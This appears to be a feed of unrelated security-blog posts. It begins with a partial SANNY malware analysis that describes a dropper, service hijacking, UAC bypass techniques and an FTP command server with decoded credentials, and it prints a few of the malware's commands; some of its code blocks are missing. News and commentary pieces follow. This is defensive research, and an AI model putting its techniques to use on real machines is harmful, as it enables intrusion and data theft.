Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (component inside

  • For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
  • For a 64-bit operating system: rundll32 update.dll EntryPoint

For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:

The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:

Stage 2: CAB File Analysis

As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.

The CAB file contains the following components:

  • install.bat – BAT file used to deploy and execute the components.
  • ipnet.dll – Main component that we refer to as SANNY malware.
  • ipnet.ini – Config file used by SANNY malware.
  • NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
  • update.dll – Performs UAC bypass on Windows 10.

install.bat will perform the following essential activities:

  1. Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:

  2. Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application) by first stopping this service, and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started:

  3. After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file:

ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:

  1. ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
  2. Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.

The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:

  1. Deletes the module NTWDBLIB.DLL from the disk using the following command:

    cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

  2. Sets the code page on the system to 65001, which corresponds to UTF-8:

    cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

Command and Control (C2) Communication

SANNY malware uses the FTP protocol as the C2 communication channel.

FTP Config File

The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.

This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8

Upon decoding the file, the following credentials can be recovered:

  • FTP Server: ftp.capnix[.]com
  • Username: cnix_21072852
  • Password: vlasimir2017

It then continues to perform the connection to the FTP server decoded from the aforementioned config file, and sets the current directory on the FTP server as “htdocs” using the FtpSetCurrentDirectoryW function.

System Information Collection

For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.

System information is gathered from the machine using the following command:

The list of running tasks on the system is gathered by executing the following command:

C2 Commands

After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.

Upon discovery of the file with the “to everyone” substring, the malware will download the file and then performs actions based on the following command names:

  • chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip commands allows the attacker to migrate malware to a new FTP C2 server. The command has the following syntax: 

  • pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:

The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.

  • put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:

  • default command: If the command begins with the substring “cmd /c”, but it is not followed by either of the previous commands (chip, pull, and put), then it directly executes the command on the machine using WinExec.
  • /user command: This command will execute a command on the system as the logged in user. The command duplicates the access token of “explorer.exe” and spawns a process using the following steps:

    1. Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
    2. Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
    3. Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.

C2 Command



Update the FTP server config file


Upload a file from the machine


Copy an existing file to a new destination


Create a new process with explorer.exe access token

default command

Execute a program on the machine using WinExec()

Compression and Encoding Data

SANNY malware uses an interesting mechanism for compressing the contents of data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:

  1. Creates an empty ZIP file with the name: in the %temp% directory.
  2. Writes the first 16 bytes of the PK header to the ZIP file.
  3. Calls the CopyHere method of IShellDispatch interface to compress the collected data and write to
  4. Reads the contents of to memory.
  5. Deletes from the disk.
  6. Creates an empty file, post.txt, in the %temp% directory.
  7. The file contents are Base64 encoded (using the same custom character set mentioned in the previous FTP Config File section) and written to the file: %temp%\post.txt.
  8. Calls the FtpPutFileW function to write the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”

Execution on Windows 7 and User Account Control (UAC) Bypass

NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.

The purpose of this DLL module is to launch the install.bat file. The file cliconfg.exe is a legitimate Windows binary (SQL Client Configuration Utility), loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and results in a UAC bypass.

Execution on Windows 10 and UAC Bypass

Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.

The main actions performed by update.dll are as follows:

  1. Executes the following commands to setup the Windows registry for UAC bypass:

  2. Leverages a UAC bypass technique that uses the legitimate Windows binary, fodhelper.exe, to perform the UAC bypass on Windows 10 so that the install.bat file is executed with elevated privileges:

  3. Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system:


This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.

Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

SHA256 Hash

Original Filename


РГНФ 2018-2019.doc



Copy of communication from Security Council Committee (1718).doc



a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170 (64-bit)

a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113 (32-bit)

Cyberbullying – How Parents Can Minimize Impact On Kids

Cyberbullying: if you have a tween or teen and haven’t workshopped this with your kids then you need to put a time in the diary now. Cyberbullying is one of the biggest challenges our children’s generation will face and unfortunately, it isn’t going away.

The recent tragic suicide of 14 year old Aussie girl Amy ‘Dolly’ Everett as a result of online bullying needs to be a wake-up call for parents. Many kids who are bullied online feel completely ashamed and publicly humiliated and can’t see a way past the embarrassment. They don’t have the skills to handle it and don’t know where to seek help. Yes, we are first-generation digital parents BUT we need to prioritise our children’s safety and well-being online. And sort this out FAST!

How Big An Issue Is Cyberbullying?

Image of crying girl in silhouette surrounded by cyberbullying text messages.
Aussie tweens/teens aged 12-16 are the primary targets of cyberbullying. 63% of the victims are girls.

In its 2016-17 annual report, the Office of the e-Safety Commissioner reveals an increase of 60% in the reported cases of cyberbullying compared with the previous year. The report also shows that:

  • Aussie tweens/teens between the ages of 12 and 16 are the primary targets of cyberbullying
  • Girls made up 63% of the victims

And it isn’t just us parents that consider this to be a big issue – our teens are also concerned. A study of 5000 teens across eleven countries by Vodafone in 2015 showed that in fact over half the teens surveyed considered cyberbullying to be worse than face-to-face bullying, and that 43% believe it is a bigger problem for young people than drug abuse!

So, clearly we have a problem on our hands – and one that isn’t getting better over time.

Why Is Cyberbullying Occurring More Frequently?

Many parenting experts believe a lack of empathy to be a major factor in cyberbullying. In her book, Unselfie, US Parenting Expert Dr Michele Borba explains that we are in the midst of an ‘empathy crisis’ which is contributing to bullying behaviour. She believes teens today are far less empathetic than they were 30 years ago.

Giving children access to devices and social media before they have the emotional smarts to navigate the online world is another factor. You would be hard-pressed to find a child in Year 5 or 6 at a primary school in any Australian capital city who doesn’t have access to or own a smartphone. And once that phone has been given to your child, it’s impossible to supervise their every move. Within minutes they can join social media platforms (some creativity required on the age), enter chat rooms, and view highly disturbing images.

The younger the child, the less likely he or she is to have the emotional intelligence to either navigate tricky situations or make smart decisions online. Perhaps we should all take a lesson from Microsoft co-founder Bill Gates who made his kids wait till they were 14 until being given a phone?

How To Minimise The Risk Of Your Child Being Cyberbullied

There are no guarantees in life, but there are certain steps we can take to reduce the chance of our children being impacted by cyberbullying. Here are my top 5 suggestions:

  1. Communicate.
    Establishing a culture where honest, two-way communication is part of the family dynamic is one of the absolute best things you can do. Let your children know they can confide in you, that nothing is off-limits and that you won’t overreact. Then they will be more likely to open up to you about a problem before it becomes insurmountable.
  2. Understand Their World.
    With a deep understanding of your child’s world (their friends, their favourite activities, the movies they see) you’re better equipped to notice when things aren’t swimming along nicely. Establishing relationships with your child’s teachers or year group mentors is another way to keep your ear to the ground. When a child’s behaviour and activity level changes, it could be an indicator that all is not well. So some parental detective work may be required!
  3. Weave Cyber Safety Into Your Family Dialogue.
    We all talk about sun safety and road safety with our children from a young age. But we need to commit to doing the same about cyber safety. Teach your kids never to share passwords, never to give out identifying information of any kind online, never to respond to online trolls or bullies. Then they will definitely add a layer of armour to shield them from becoming a victim of cyberbullying.
  4. Limit Screen Time.
    I know it seems like an ongoing battle but limiting screen time for social media is essential. One of the easiest ways of doing this is by offering them attractive real-life options. Bike rides, beach visits and outings with friends and family are all good ways of redirecting their attention. And make sure their phone/tablet is out of easy reach at night. Yes, it is more effort but it is so worth it. Less time online = less risk!
  5. Teach Your Kids What To Do If They Are Cyberbullied.
    It is essential your kids know what to do if they are being cyberbullied. Blocking the bullying is critical, so take some time with your kids to understand the block features on the social networks they use. Collecting evidence is crucial, everything should be screen-shot – ensure your child knows how to do this. You can report the cyberbullying incident to the Office of the eSafety Commissioner who work to have offensive material removed and cyberbullying situations addressed. And why not check out the support offered by your child’s school? It’s important your kids know they have a number of trusted adults in their life they can get help from if things get tough.

So, let’s commit to doing what we can to protect our kids from cyberbullying. Your kids need to know that they can talk to you about anything that is bothering them online – even if it is tough or awkward. Dolly Everett’s final drawing, before she took her life, included the heart-rending caption ‘…speak even if your voice shakes.’ Please encourage your kids to do so.

Alex xx

The post Cyberbullying – How Parents Can Minimize Impact On Kids appeared first on McAfee Blogs.

DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques

Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages.

However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules.

In this DOSfuscation white paper, first presented at Black Hat Asia 2018, I showcase nine months of research into several facets of command line argument obfuscation that affect static and dynamic detection approaches. Beginning with cataloguing a half-dozen characters with significant obfuscation capabilities (only two of which I have identified being used in the wild), I then highlight the static detection evasion capabilities of environment variable substring encoding. Combining these techniques, I unveil four never-before-seen payload obfuscation approaches that are fully compatible with any input command on cmd.exe's command line. These obfuscation capabilities de-obfuscate in the current cmd.exe session for both interactive and noninteractive sessions, and avoid all command line logging. Finally, I discuss the building blocks required for these new encoding and obfuscation capabilities and outline several approaches that defenders can take to begin detecting this genre of obfuscation.

As a Senior Applied Security Researcher with FireEye's Advanced Practices Team, I am tasked with researching, developing and deploying new detection capabilities to FireEye's detection platform to stay ahead of advanced threat actors and their ever-changing tactics, techniques and procedures. FireEye customers have been benefiting from multiple layers of innovative obfuscation detection capabilities developed and deployed over the past nine months as a direct result of this research.

Download the DOSfuscation white paper today.

Daniel Bohannon (@danielhbohannon) is a Senior Applied Security Researcher on FireEye's Advanced Practices Team.

The CLOUD Act: a danger to journalists worldwide

el sisi
Wikimedia Commons

UPDATE: The Omnibus bill, which included the CLOUD Act, was passed by the Senate on Thursday night and signed into law by President Trump on Friday afternoon.

Congress is on the verge of passing a dangerous bill, known as the Clarifying Lawful Overseas Use of Data Act (“CLOUD Act”), which will have disastrous implications for privacy, as it would allow foreign governments to access private data on American soil while circumventing important privacy protections. In particular, it poses a serious threat to foreign journalists who report on repressive regimes.

Current laws dictate that a foreign prosecutor who wants to access data stored by American companies cannot do so directly, since they lack jurisdiction. Instead, they have to go through the “mutual legal assistance treaty” (MLAT) process—which requires sign off from the Justice Department and an order by a judge in each individual case.

MLATs are agreements between two countries in which each agrees to help the other with criminal investigations. The U.S. has signed MLATs with more than 60 countries.

But under the CLOUD Act, instead of relying on the MLAT process, foreign governments could bypass this system and instead demand data directly from technology companies in the United States if they negotiate a blanket agreement with the executive branch.

This poses a real risk for journalists in repressive regimes who rely on internet services provided by American technology companies. For example, say that a journalist in a country like Egypt uses Gmail, and therefore some of their emails are stored on one of Google’s server farms in the United States. In recent years, Egypt has aggressively cracked down on dissent and put hundreds of journalists in jail on politically-motivated charges of terrorism.

Egypt is a strong U.S. ally, and the country currently has an MLAT with the United States. The CLOUD Act gives the power to certify governments under this act to the Trump administration. Trump has heaped praise on Egypt’s military dictator Abdel Fattah el-Sisi. So would his Justice Department give Egypt a blanket certification to proceed under the CLOUD Act?

If the Trump administration does label Egypt a "qualifying foreign government," then whenever the Egyptian government decides that it wants access to a journalist’s emails stored in the United States in order to prosecute that journalist, it could simply request that Google hand over the emails. The Justice Department does not need to approve each individual request, and neither does a federal judge.

Unless the technology company found a request so egregious that it goes to court to contest it, no federal judge would even know about the surveillance demand from a foreign government. Foreign governments would be given power to wiretap on U.S. soil in conversations that might involve U.S. persons.

To make matters worse, Congress has attached the CLOUD Act to this week’s $1.3 trillion Omnibus spending bill that includes allocation of funds to a wide variety of projects, including the border wall. On March 22, the United States House of Representatives passed the Omnibus spending bill. While it still must pass the Senate to become law, because the spending bill touches so many controversial issues, there will likely be no debate and no hearings on the CLOUD Act—despite its significance for the future of press and information freedom.

Proponents of the bill claim the process now is cumbersome and time consuming. It’s true the MLA process may takes time, but that’s for good reason: to ensure due process. It is immeasurably preferable to legislation that would expand law enforcement’s reach across the world. 

Writing in Lawfare, Neema Singh Guliana of the ACLU and Naureen Shah of Amnesty International point out the serious problems with the CLOUD Act’s approach:

"In such a situation, the only real fail-safe to prevent a technology company from inadvertently acceding to a harmful data request is the technology company itself. But would even a well-intentioned technology company, particularly a small one, have the expertise and resources to competently assess the risk that a foreign order may pose to a particular human rights activist? Would it know, as in the example above, when to view Turkey’s terrorism charges in a particular case as baseless? In many cases, companies would likely rely on the biased assessments by foreign courts and fulfill requests."

The CLOUD Act has worrying implications not just for everyone's privacy rights, but to the ability of journalists around the world to protect their data. Urge your representatives to oppose the Omnibus spending bill as long as it includes the dangerous CLOUD Act..

Travel Agency Orbitz Hit with Data Breach, 880,000 Payment Cards Affected

We all love a good getaway, and as we look ahead to spring and summer, most of us are already planning our next vacation. To do that, we’ll tap one of the many online travel agencies out there to help us organize our plans. Only now, some travel-goers may have to stop trip planning so they can start planning for credit monitoring, as one of the most popular travel agencies,, was hit with a data breach that may have exposed as many as 880,000 payment cards.

The online travel agency reported two separate data disclosures, as an attacker may have accessed customers’ personal information shared on and a handful of associated websites between Jan. 1, 2016 between Dec. 22, 2016.

What’s more – in addition to the payment cards, hackers may have also stolen customers’ full name, date of birth, phone number, email address, physical and/or billing address and gender information. Now, with all this personal information potentially out in the open, it’s important affected customers start thinking about protecting their personal identities. To do just that, follow these tips:

  • Regularly review your online account info. Things like regularly reviewing transactions online and making sure account contact info hasn’t changed are good for keeping tabs on anyone trying to hijack your account.
  • Set up an alert. If you know there’s a chance your personal data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Consider an identity theft protection solution. With this breach and others before it, consumers are faced with the possibility of identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Travel Agency Orbitz Hit with Data Breach, 880,000 Payment Cards Affected appeared first on McAfee Blogs.

Economic Impact of Cybercrime: Why Cyber Espionage isn’t Just the Military’s Problem

In a technology-driven age, entrepreneurs, organizations, and nations succeed or fail in large part based on how effectively they develop, implement, and protect technology. One of the most notable aspects of “The Economic Impact of Cybercrime” report released recently is the prominence of cyber espionage, the cyber-theft of intellectual property (IP) and business confidential information. The report from the Center for Strategic and International Studies (CSIS) and McAfee estimates that the cost of cybercrime to the global economy is around $600 billion annually, or 0.8% of global GDP, and cyber espionage accounts for 25% of that damage, more than any other category of cybercrime. Furthermore, the report argues that “Internet connectivity has opened a vast terrain for cybercrime, and IP theft goes well beyond traditional areas of interest to governments, such as military technologies.”

When we think of cyber espionage, we tend to think of events such as the Chinese military’s theft of the F-35 joint strike fighter’s blueprints from U.S. corporations. Last month, the Associated Press reported a similar event where Russian hackers attacked several U.S. corporations attempting to steal drone technologies used by the U.S. military.

But there are also cases such as 2009 Operation Aurora attacks, in which nation-state hackers allegedly tied to the China’s People’s Liberation Army sought to steal IP and business confidential information from IT, chemical, web services, and manufacturing firms as well as military contractors. There is also the example from the 2004 Nortel Networks cyber-attacks that allegedly compromised IP later used to strengthen the market position of Chinese telecommunications giant Huawei.

Such examples suggest that nation states are seeking to steal IP not only to enhance their military strength, but also to achieve technological leadership throughout the rest of their economies without the investments, human talent, or other foundational elements associated with technical innovation.

Put simply, cyber espionage isn’t just the U.S. military’s problem. Organizations beyond military contractors should assume they could become targets of such cybercrimes.

If enough of a profit motive is there, it’s wise to assume that the hacking expertise and tools to steal IP are within your would-be attackers’ reach. Furthermore, it’s wise to assume that the beneficiaries of commercial cyber espionage are capable of copying your compromised product designs and building them into their own products, just as Chinese government engineers had integrated stolen F-35 design features into China’s J-20 stealth fighter.

The cyber theft of such IP could result in lost market share and revenues for corporations. Such theft could smother a nation’s most promising new startups in their Series A cradles, or drive its most innovative mid-sized companies out of business, erasing wealth and jobs in the process.

The CSIS report identified three key cyber espionage challenges facing organizations and nations today.

Challenges of Detection

 Cyber espionage maintains a lower profile than critical infrastructure attacks, ransomware, mega-consumer data hacks, and identity theft and fraud, and other threats in part because there’s no incentive to report cyber espionage incidents. Victimized companies don’t wish to report them, if indeed they ever become aware of them. The attackers don’t wish to alert their victims or the public to their crimes. Victim organizations still own the compromised IP or business confidential information and could easily attribute declines in market share and revenue to any number of tactical and strategic moves on the part of competitors. Unsurprisingly, such incidents go undiscovered and under reported.

Challenges of Attribution

As in every other area of cybersecurity, the difficulty of attribution makes the policing of cyber espionage complicated if not near impossible. Attacks of this nature are sophisticated and designed to obscure the identity of the actors behind them. Governments are in the best position to determine attribution because they can combine the analysis of technical cyber-attack forensics with analysis of traditional intelligence to identify actors. But holding adversaries accountable isn’t easy given the nature of the required inputs and analysis that enable attribution.

For instance, the U.S. government has accused Chinese hackers associated with the People’s Liberation Army (PLA) of being responsible for half of the cyberespionage activity targeting U.S. “IP and commercially valuable information,” and claimed that this activity had inflicted $20 billion in economic damage by 2014.

But the evidence used to make such attribution determinations is not easily exposed without revealing the means and methods by which cyber threat researchers and government agencies came by it.

Challenges of Definition

The CSIS report revisits the 2015 Barack Obama-Xi Jinping Summit, where the leaders of the U.S. and China agreed that their intelligence communities would cease to conduct “commercial espionage,” while allowing each nation to engage in military-related espionage appropriate to their respective national security interests. The nations comprising the world’s 20 largest economies agreed to a similar “no-commercial espionage” pledge later that year.

Any such agreement obviously requires accountability mechanisms to have an impact. But it also requires that the nations agree to specific and consistent definitions of what constitutes commercial versus military espionage.

CSIS notes that the evidence is mixed as to whether the Chinese government has slowed commercial espionage in accordance with the 2015 agreement.  But the think tank notes that despite high level dialogues and pledges between nations, officials from multiple countries maintain that commercial IP theft continues unabated.

Last month’s Worldwide Threat Assessment of the U.S. Intelligence Community confirmed that China and other nation-state actors are continuing to use cyber-attacks to “acquire U.S. intellectual property and proprietary information to advance their own economic and national security objectives.”

The assessment goes so far as to suggest that because the disruptive technologies of the 21st century are being developed by public and private competitors around the world, any significant loss of U.S. IP in pivotal areas—artificial intelligence, 5G networking, 3D printing, nano-materials, quantum computing, biotech, and advanced robotics—could ultimately weaken U.S. military and economic power, and result in a loss of national competitiveness in the global marketplace, as well as on the battlefield.

Preventing the Theft of our Future

 At its most basic level, the theft of IP and business confidential information is a theft of the future. It’s a theft of future national security, future business for companies, future wealth for a nation’s communities, and future high paying jobs and standards of living for a nation’s citizens.

Because technologies don’t fit neatly within civilian and military sector silos, particularly throughout their lifecycles, it’s important for organizations to take cyber espionage seriously. Even beyond technology providers, any organization producing anything of great value should take care to consider that that great value is valuable to others, and remember that anything of great value must be protected.

Please go here for more information on the report’s assessments.

The post Economic Impact of Cybercrime: Why Cyber Espionage isn’t Just the Military’s Problem appeared first on McAfee Blogs.

Security Champions: a Scalable Approach for Securing DevOps

DevOps and Security Champions

The enormous growth of DevOps is no accident. As organizations attempt to navigate the complexities of digital business, speed and flexibility are everything. Yet somewhere between innovation and disruption lies a basis fact: A DevOps initiative is only as good as the security framework that supports it.

Unfortunately, many organizations focus on speed and precision at the expense of security. The problem, according to a 2017 report from Gartner, is that DevSecOps is about speed and precision, yet security is often seen by development managers as a training burden or blocking issue. As a result, organizations become mired in a “fix it later” mentality.*

Overcoming this hurdle can prove daunting. Tossing money at more security and more training isn't necessarily the answer. A better approach centers on developing security champions who convey security priorities to colleagues. This approach boosts buy-in. It also speeds the feedback loop and helps translate security priorities into secure development practices that span groups and jargon.

Code Red

Establishing a DevSecOps framework is at the center of an agile and flexible enterprise. But putting the concept into motion is easier said than done. For one thing, business leaders must move beyond the perception that security is a roadblock for effective DevOps. When security is successfully integrated into processes and workflows, it creates a more streamlined and secure development environment. For another, they must adopt the right methods and techniques.

Gartner points out: “The use of a security champion grants organizations an individual who can act as an on-site advisor and as an expert who can anticipate potential design or implementation problems early in the development process. Champions can reduce the perceived complexity of secure coding by providing immediate, real-world examples in the team's code and can focus on immediate remediation rather than more abstract, less relatable issues. ”*

Moving Beyond DevOps

There are several steps that can help an organization cultivate security champions and make the leap to DevSecOps: Ask for volunteers, Establish a minimum baseline of what it takes to be qualified as a security champion, Provide training for these basic skills, Set expectations about time commitments, Train team leaders whenever possible.* Please read the report for a fuller description of these topics.

A Winning Approach

While there is no simple or single way to transform DevOps into DevSecOps, security champions can serve as a powerful tool. They can help an organization adopt a best practice approach.

Learn how to take your DevOps program to the next level by cultivating security champions.

Download the Gartner Report


*Gartner - Magic Quadrant for Application Security Testing, Ayal Tirosh, Dionisio Zumerle, Mark Horvath, 19 March 2018

I’m A Tiger – Enterprise Security Weekly #84

This week, John Strand takes the show by the reigns and conducts an outstanding interview with Brian Honan, who is recognised internationally as an expert on cybersecurity! John also gives a tech segment on how enterprises defend against attacks! All that and more, here on Enterprise Security Weekly!

Full Show Notes:


What Were the CryptoWars ?

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.

Crypto in this case refers to cryptography (not crypto-currencies like BitCoin). Cryptography is a collection of clever ways for you protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you want can transform the gobbledegook back to plain English (this process is called decryption).

People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.

However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.

World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.

The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.

In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Sharmir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words the cryptography worked by having a magical secret method only known to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.

This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.

And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.

This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.

But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.

In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.

However that wasn’t the end of the story. Like in so many cases “justice too long delayed is justice denied”. The internet is becoming systematically protected by encryption in the last two years thanks to the amazing work of LetsEncrypt. However, we have spent almost 20 years sending most of our browsing and search requests via postcard, and that “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack putting many systems at risk even today.

Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.

WiTopia personalVPN review: It’s all about choices

WiTopia personalVPN in brief:

  • P2P allowed: Yes
  • Business location: Reston, VA
  • Number of servers: 300+
  • Number of country locations: 45
  • Cost: $50 (Basic) / $70 (Pro)
  • VPN protocol: OpenVPN (default)
  • Data encryption: AES-128
  • Data authentication: SHA2
  • Handshake encryption: TLSv1.2

I’ve grown to expect certain things from a VPN service: a nice-looking and easy-to-use desktop program, and extra features like double VPNs, dedicated torrent servers, or sometimes Netflix compatibility. PersonalVPN from WiTopia confounds all those expectations a little, but is still a great option to consider.

To read this article in full, please click here

RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone

China is a region that has been targeted with mobile malware for over a decade, as malware authors there are continually looking at different tactics to lure victims. One of the most innovative tactics that we have come across in the past several years is to get victims to buy discounted devices from sellers that have compromised a smartphone. And now, one of these campaigns, Android.MobilePay (aka dubbed RottenSys) is making headlines, though McAfee has been aware of it for over two years. The tactic used by the author(s)/distributors is straightforward; they install fake apps on a device that pretend to provide a critical function, but often don’t get used.

RottenSys is stealthy. It doesn’t provide any secure Wi-Fi related service but is rather an advanced strain of malware that swoops almost all sensitive Android permissions to enable its malicious activities. In order to avoid detection, RottenSys doesn’t come with an initial malicious component and or immediately initiate malicious activity. The strain has rather been designed to communicate with its command-and-control servers to obtain the actual malicious code in order to execute it and following which installs the malicious code onto the device.

Given it installs any new malicious components from its C&C server, RottenSys can be used to weaponize or take full control over millions of infected devices. In fact, it already seems that the hackers behind RottenSys have already started turning infected devices into a massive botnet network.

